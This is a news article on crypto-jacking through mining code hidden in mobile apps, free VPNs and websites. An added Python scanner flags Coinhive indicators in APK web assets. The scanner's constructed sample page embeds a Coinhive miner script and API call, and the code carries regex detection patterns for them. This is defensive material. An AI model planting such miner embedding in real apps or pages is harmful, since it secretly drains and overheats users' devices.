Cyber criminals are increasingly exploiting the crypto-currency boom by using app stores to infect mobile devices and free VPNs with malicious mining software.
According to Francis Dinha, CEO at OpenVPN, this isn't affecting unofficial app stores only, but official ones too.
"Earlier this month, there was a crypto-mining campaign in operation called crypto-jacking or drive-by mining that was being secretly embedded in mainly gaming and sports streaming apps that were available from the Google Play Store, targeting millions of Android device users.
"Google has been addressing this issue and has apparently removed the suspicious apps from Play Store," he adds.
Dinha says threat actors are using a variety of apps, including games, streaming services and virtual private networks (VPNs).
"When the application is downloaded, the malware directs users to various Web sites for purposes of mining. They are sapping a little CPU power from millions of mobile devices. They know the mobile device is an easy target because of the lack of Web filtering and general lack of basic security applications."
Coinhive
Monero crypto-currency has been implicated in the recent growth of crypto-jacking and has been designed to be mined on individual PCs, he adds.
"A few off-the-shelf Monero mining tools have come into circulation, some of which accomplish crypto-jacking by hiding a Coinhive JavaScript miner within the app or on a normal Web site; it does not need to be on an app."
In this way, even a normal Web site can run Coinhive without the user's knowledge. In the case of an app, when it's launched, an HTML file with the embedded JavaScript converts the device's CPU power into a mining tool for Monero, he explains.
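An added example, not from the article or from OpenVPN: a minimal Python check that scans the HTML and JavaScript assets bundled in an APK for the Coinhive embedding described above. The indicator strings are based on Coinhive's publicly known library naming and the sample APK is constructed; both are assumptions rather than details from the article.

```python
import io
import re
import zipfile

# Indicators based on Coinhive's publicly known library naming (assumption:
# not taken from the article; renamed or obfuscated miners will evade them).
INDICATORS = {
    "coinhive-script": re.compile(rb"coinhive(\.min)?\.js", re.I),
    "coinhive-domain": re.compile(rb"\bcoin-?hive\.com\b", re.I),
    "coinhive-api": re.compile(rb"\bCoinHive\.(Anonymous|User)\s*\("),
}
WEB_SUFFIXES = (".html", ".htm", ".js")


def scan_apk(apk_bytes):
    """Return sorted (entry_name, indicator) pairs for web assets in an APK."""
    findings = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:  # an APK is a zip archive
        for info in apk.infolist():
            if not info.filename.lower().endswith(WEB_SUFFIXES):
                continue  # skip dex code, images and other binary entries
            data = apk.read(info)
            for name, pattern in INDICATORS.items():
                if pattern.search(data):
                    findings.add((info.filename, name))
    return sorted(findings)


def build_sample_apk():
    """Constructed sample: a zip laid out like an APK with two HTML assets."""
    miner_page = (
        b"<html><body><script src='https://coinhive.com/lib/coinhive.min.js'>"
        b"</script><script>var m = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');"
        b"</script></body></html>"
    )
    clean_page = b"<html><body><h1>Live scores</h1></body></html>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as apk:
        apk.writestr("assets/engine.html", miner_page)
        apk.writestr("assets/help.html", clean_page)
        apk.writestr("classes.dex", b"dex\n035\x00")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, indicator in scan_apk(build_sample_apk()):
        print(f"{entry}: {indicator}")
```

A hit means the asset deserves manual review; a clean result does not rule out a miner that is loaded from the network at runtime.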
Running hot
Dinha says the apps appear to have legitimate functionality, although the real goal is to provide CPU power to mine Monero. "Draining a device CPU could lead to super slow functionality and from long-term overheating could ultimately damage the device."
He says some of these malicious tools are fairly advanced and are able to monitor CPU usage and even the temperature of the device so as not to raise suspicion. Users may notice their device functions slowing and/or possible suspicious surfing behaviour.
No free lunch
The best way for users to help avoid downloading any malicious app or VPN service is to be wary of free applications, adds Dinha.
"Don't download from untrusted third-party marketplaces, and keep devices updated. Within the device itself, users should go to task manager settings and check to see if the device CPU performance is unusually high. If so, they can shut down or close running apps. If there is no change in performance, they should suspect malware."
In addition, he says there are some verified browser extensions, such as the Ad Block Chrome extension, that protect devices from malicious plugins and in-browser malware. Chrome offers extensions such as No Coin and minerBlock too.